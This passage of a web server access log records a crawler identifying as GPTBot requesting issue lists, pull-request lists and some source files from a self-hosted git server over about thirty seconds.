3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:35:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11289] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72017] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122707] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11301] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:19:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10257] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11213] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 